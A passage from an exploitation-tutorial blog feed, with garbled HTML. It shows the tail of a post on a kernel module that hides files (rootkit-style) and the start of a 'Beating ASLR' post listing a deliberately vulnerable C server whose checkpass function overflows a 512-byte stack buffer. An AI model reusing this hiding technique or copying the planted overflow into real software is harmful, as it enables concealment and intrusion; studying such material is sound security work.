class="go"/root/lkms/hidefile.c:71:2: warning: passing argument 1 of ‘set_page_ro’ makes integer from pointer without a cast [enabled by default]/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:49:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:72:9: warning: ‘return’ with a value, in function returning void [enabled by default]/span/span span class="code-line"span class="go" Building modules, stage 2./span/span span class="code-line"span class="go" MODPOST 3 modules/span/span span class="code-line"span class="go" LD [M] /root/lkms/hidefile.ko/span/span span class="code-line"span class="go"make[1]: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae#39;/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spantouch thisisatestfile.txt/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls/span span class="code-line"span class="go"hello.c hello.o hidefile.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go"hello.ko hidefile.c hidefile.o reverse_app reverse-app.c reverse.mod.o thisisatestfile.txt/span/span span class="code-line"span class="go"hello.mod.c hidefile.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go"hello.mod.o hidefile.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spaninsmod ./hidefile.ko/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls/span span class="code-line"span class="go"hello.c hello.o hidefile.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go"hello.ko hidefile.c hidefile.o reverse_app reverse-app.c reverse.mod.o/span/span span class="code-line"span class="go"hello.mod.c hidefile.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go"hello.mod.o hidefile.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanrmmod hidefile/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls/span span class="code-line"span class="go"hello.c hello.o hidefile.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go"hello.ko hidefile.c hidefile.o reverse_app reverse-app.c reverse.mod.o thisisatestfile.txt/span/span span class="code-line"span class="go"hello.mod.c hidefile.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go"hello.mod.o hidefile.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"/code/pre/div /td/tr/table pWoohoo! There is 1 problem with this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spaninsmod ./hidefile.ko/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls/span span class="code-line"span class="go"hello.c hello.o hidefile.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go"hello.ko hidefile.c hidefile.o reverse_app reverse-app.c reverse.mod.o/span/span span class="code-line"span class="go"hello.mod.c hidefile.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go"hello.mod.o hidefile.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls thisisatestfile.txt/span span class="code-line"span class="go"thisisatestfile.txt/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l thisisatestfile.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 0 Jul 11 18:18 thisisatestfile.txt/span/span span class="code-line"/code/pre/div /td/tr/table pSo if you put the whole filename there it still shows that the file exists but we can improve upon that later, we will need to hook different system calls./p h2Conclusion/h2 pThere is a lot involved with manipulating the kernel like this, it requires a lot of patients and determination./p pYou will need to look through a lot of source code and use tools like codegrep/code to find exactly what you need to get the job done./p pAlso codestrace/code is very useful when looking for the system calls being used by an application but its also handy to be able to clean up the output for readability./p pHappy Hacking :-)/p
✇eXploit

Beating ASLR

By: 0xe7
pHere we are going to start with the first protection I want to look at which is a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization" target="_blank"address space layout randomization (ASLR)/a./p pIn parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a, a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a, a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a and a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"4/a ASLR had been disabled./p pASLR basically randomizes the a href="https://en.wikipedia.org/wiki/Virtual_address_space" target="_blank"virtual address space/a of all userland applications and in more modern OSs, kernel space too./p !-- more -- pBefore ASLR, the virtual address space of an application was completely static, meaning that everything will always be at the same memory address each time the application is run./p pIn parts 1, 2 and 3 we've taken advantage of this by being able to predict the address that our a href="https://en.wikipedia.org/wiki/Shellcode" target="_blank"shellcode/a./p pThis protection is slightly newer in the Linux kernel than a href="https://en.wikipedia.org/wiki/NX_bit" target="_blank"NX/a, as it was first implemented in 2005 but it will introduce us to an idea which we will use much more extensively to beat NX./p h2The App/h2 pThe application below is almost the same as the 1 in part a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a of this series:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;sys/socket.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;netinet/in.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;strings.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"span class="cp"#define CNUM 58623/span/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"span class="cp"#define TFILE quot;tokenquot;/span/span span class="code-line"span class="cp"#define PORT 9999/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[]);/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendtoken/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"listenfd/spanspan class="p",/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"servaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"socklen_t/spanspan class="w" /spanspan class="n"clilen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"pid_t/spanspan class="w" /spanspan class="n"childpid/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="mi"1000/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listenfd/spanspan class="o"=/spanspan class="n"socket/spanspan class="p"(/spanspan class="n"AF_INET/spanspan class="p",/spanspan class="n"SOCK_STREAM/spanspan class="p",/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"bzero/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_family/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"AF_INET/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_addr/spanspan class="p"./spanspan class="n"s_addr/spanspan class="o"=/spanspan class="n"htonl/spanspan class="p"(/spanspan class="n"INADDR_ANY/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_port/spanspan class="o"=/spanspan class="n"htons/spanspan class="p"(/spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"bind/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p")))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error: Unable to bind to port %d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listen/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",/spanspan class="mi"1024/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="p"(;;)/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"clilen/spanspan class="o"=/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"connfd/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"accept/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"recvfrom/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p",/spanspan class="w" /spanspan class="mi"1000/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="n"n/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"5/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"senderror/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendtoken/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendfile/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Received the following:/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;%squot;/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"close/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[])/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;Wrong password: quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"16/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"p/spanspan class="p"),/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendtoken/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"TFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"TFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p",/spanspan class="w" /spanspan class="n"i/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"atoi/spanspan class="p"(/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="n"CNUM/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"5/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe main difference here is that the input is converted to a number and if that 